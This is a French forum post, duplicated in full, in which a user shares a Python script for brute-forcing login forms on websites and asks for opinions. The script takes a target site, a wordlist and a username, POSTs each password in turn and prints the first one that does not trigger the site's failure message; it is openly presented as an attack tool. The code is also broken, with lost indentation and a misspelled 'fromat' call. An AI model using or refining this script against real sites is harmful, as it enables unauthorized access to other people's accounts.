Bonjour,
J'ai réalisé un script permettant de faire du BruteForce sur des sites non sécurisé, car j'ai essayé de le crée avec mes connaissances, le voici :
# coding: utf8
from requests import *
import re
warning = ""
while warning != "Y":
warning = raw_input("ATTENTION : Ce script ne marche qu'avec la method POST ! Voulez-vous continué ? [Y]/N ")
else:
site = raw_input("Rentrez le site à attaquez : ")
wordlist = raw_input("Veuillez entrez le chemin de votre wordlist : ")
id_user = raw_input("Veuillez rentrez l'id user du site : ")
id_pass = raw_input("Veuillez rentrez l'id pass du site : ")
user = raw_input("Veuillez rentrez l'identifiant : ")
bad = raw_input("Veuillez rentrez ce que le site dit quand c'est un mauvais mot de passe : ")
with open(wordlist) as f:
content = f.readlines()
for password in content:
password = password.rstrip()
payload = {id_user: user, id_pass: password}
print("[+] On test : {0}").fromat(password)
res = post(site,data=payload).content
find = re.search(bad, res.decode('utf-8'))
if find is None:
print("Identifiant : {0} Password : {1}").format(user,password)
break
J'aimerai savoir vos avis, merci d'avance !
Cordialement, Kayzek
J'ai réalisé un script permettant de faire du BruteForce sur des sites non sécurisé, car j'ai essayé de le crée avec mes connaissances, le voici :
# coding: utf8
from requests import *
import re
warning = ""
while warning != "Y":
warning = raw_input("ATTENTION : Ce script ne marche qu'avec la method POST ! Voulez-vous continué ? [Y]/N ")
else:
site = raw_input("Rentrez le site à attaquez : ")
wordlist = raw_input("Veuillez entrez le chemin de votre wordlist : ")
id_user = raw_input("Veuillez rentrez l'id user du site : ")
id_pass = raw_input("Veuillez rentrez l'id pass du site : ")
user = raw_input("Veuillez rentrez l'identifiant : ")
bad = raw_input("Veuillez rentrez ce que le site dit quand c'est un mauvais mot de passe : ")
with open(wordlist) as f:
content = f.readlines()
for password in content:
password = password.rstrip()
payload = {id_user: user, id_pass: password}
print("[+] On test : {0}").fromat(password)
res = post(site,data=payload).content
find = re.search(bad, res.decode('utf-8'))
if find is None:
print("Identifiant : {0} Password : {1}").format(user,password)
break
J'aimerai savoir vos avis, merci d'avance !
Cordialement, Kayzek
Commentaire